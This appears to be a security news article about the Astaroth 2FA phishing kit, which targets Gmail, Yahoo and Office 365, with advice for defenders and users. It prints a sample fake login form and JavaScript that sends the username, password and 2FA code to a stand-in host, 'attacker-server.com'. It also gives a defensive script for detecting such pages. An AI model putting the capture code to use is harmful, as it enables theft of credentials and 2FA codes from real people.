A sophisticated phishing kit, known as the Astaroth 2FA phishing kit, has been identified targeting major email services such as Gmail, Yahoo, and Office 365, along with third-party login platforms.
This kit is designed to bypass two-factor authentication (2FA) security measures, posing a significant threat to users’ online security.
The Astaroth phishing kit is highly customizable and can be tailored to mimic the login pages of various services, making it difficult for users to distinguish between legitimate and fake sites.
Moreover, security analysts at SlashNext identified that it uses advanced techniques to capture login credentials and 2FA codes, often through SMS or authenticator apps.
The kit's key features are:
- Customizable Templates: The kit includes templates for popular services like Gmail, Yahoo, and Office 365, allowing attackers to create convincing phishing pages.
- 2FA Bypass: It can intercept and use 2FA codes, either by tricking users into revealing them or by exploiting vulnerabilities in authenticator apps.
- Data Encryption: The captured data is encrypted and sent to the attacker’s server, making it difficult for security systems to detect.
Technical Implementation
The phishing kit typically involves a combination of HTML, CSS, and JavaScript to create fake login pages. Here is a simplified example of how such a page might be structured:

```html
<!DOCTYPE html>
<html>
<head>
  <title>Login Page</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <form id="loginForm">
    <input type="text" id="username" placeholder="Username">
    <input type="password" id="password" placeholder="Password">
    <input type="text" id="2faCode" placeholder="2FA Code">
    <button type="submit">Login</button>
  </form>
  <script src="script.js"></script>
</body>
</html>
```
The JavaScript (script.js) would handle form submission, capturing user input and sending it to the attacker’s server:

```javascript
document.getElementById('loginForm').addEventListener('submit', function(e) {
  e.preventDefault();
  var username = document.getElementById('username').value;
  var password = document.getElementById('password').value;
  var twoFaCode = document.getElementById('2faCode').value;
  // Send data to attacker's server
  fetch('https://attacker-server.com/capture', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({username: username, password: password, twoFaCode: twoFaCode})
  });
});
```
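From the defender's side, a captured page with the structure shown above can be triaged statically: one form that asks for a password and a 2FA code together, plus script that sends data to a different origin. The following is an added example, not code from the article or from SlashNext's analysis; the function names, the field-name hints and the hosts `login.example.net` and `collector.example` are assumptions, and the sample inputs are constructed.

```javascript
// Added defensive example (not from the article): static triage of a captured page.
// Heuristic: one form asks for password AND a 2FA code, and script posts cross-origin.
const OTP_HINT = /2fa|otp|mfa|one[-_ ]?time|verif|auth.?code/i;

// Pull <input> attributes with regexes so this runs in Node without a DOM.
function parseInputs(html) {
  return [...html.matchAll(/<input\b[^>]*>/gi)].map(([tag]) => {
    const attr = (name) => {
      const m = tag.match(new RegExp(`\\s${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i'));
      return m ? (m[1] ?? m[2] ?? m[3]) : '';
    };
    return { type: attr('type').toLowerCase(), label: [attr('id'), attr('name'), attr('placeholder')].join(' ') };
  });
}

// Origins that fetch(), sendBeacon() or XMLHttpRequest.open() send to, other than the page's own.
function crossOriginTargets(script, pageUrl) {
  const page = new URL(pageUrl);
  const calls = /(?:fetch|sendBeacon)\s*\(\s*["'`]([^"'`]+)["'`]|\.open\s*\(\s*["'`]\w+["'`]\s*,\s*["'`]([^"'`]+)["'`]/g;
  const origins = new Set();
  for (const m of script.matchAll(calls)) {
    try {
      const target = new URL(m[1] || m[2], page); // resolves relative URLs against the page
      if (target.origin !== page.origin) origins.add(target.origin);
    } catch { /* unparsable URL literal: ignore */ }
  }
  return [...origins];
}

function triage(html, script, pageUrl) {
  const fields = parseInputs(html);
  const hasPassword = fields.some((f) => f.type === 'password');
  const hasOtp = fields.some((f) => f.type !== 'password' && OTP_HINT.test(f.label));
  const targets = crossOriginTargets(script, pageUrl);
  return { hasPassword, hasOtp, targets, suspicious: hasPassword && hasOtp && targets.length > 0 };
}

// Constructed samples: the first mirrors the structure shown above, the second is a benign control.
const SAMPLE_PHISH_HTML = `<form id="loginForm"><input type="text" id="username" placeholder="Username">
<input type="password" id="password" placeholder="Password">
<input type="text" id="2faCode" placeholder="2FA Code"></form>`;
const SAMPLE_PHISH_JS = `fetch('https://collector.example/capture', { method: 'POST' });`;
const SAMPLE_OK_HTML = `<form><input type="text" name="user"><input type="password" name="pass"></form>`;
const SAMPLE_OK_JS = `fetch('/session', { method: 'POST' });`;

console.log(triage(SAMPLE_PHISH_HTML, SAMPLE_PHISH_JS, 'https://login.example.net/'));
console.log(triage(SAMPLE_OK_HTML, SAMPLE_OK_JS, 'https://login.example.net/'));
```

This is a triage heuristic only: it reads string-literal URLs and will miss targets that are built at runtime or hidden by obfuscation, so a hit is a reason to inspect the page further rather than a verdict.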
The Astaroth 2FA phishing kit represents a serious threat to online security, as it targets not only email services but also third-party platforms.
Users should remain vigilant and use additional security measures such as authenticator apps with push notifications instead of SMS-based 2FA.
To safeguard against sophisticated phishing attacks like the Astaroth 2FA phishing kit, users should create strong, unique passwords, enable two-factor authentication (2FA) using authenticator apps, and exercise caution when handling links or attachments from unknown sources.
Besides this, keeping browsers and operating systems updated is essential for enhanced security.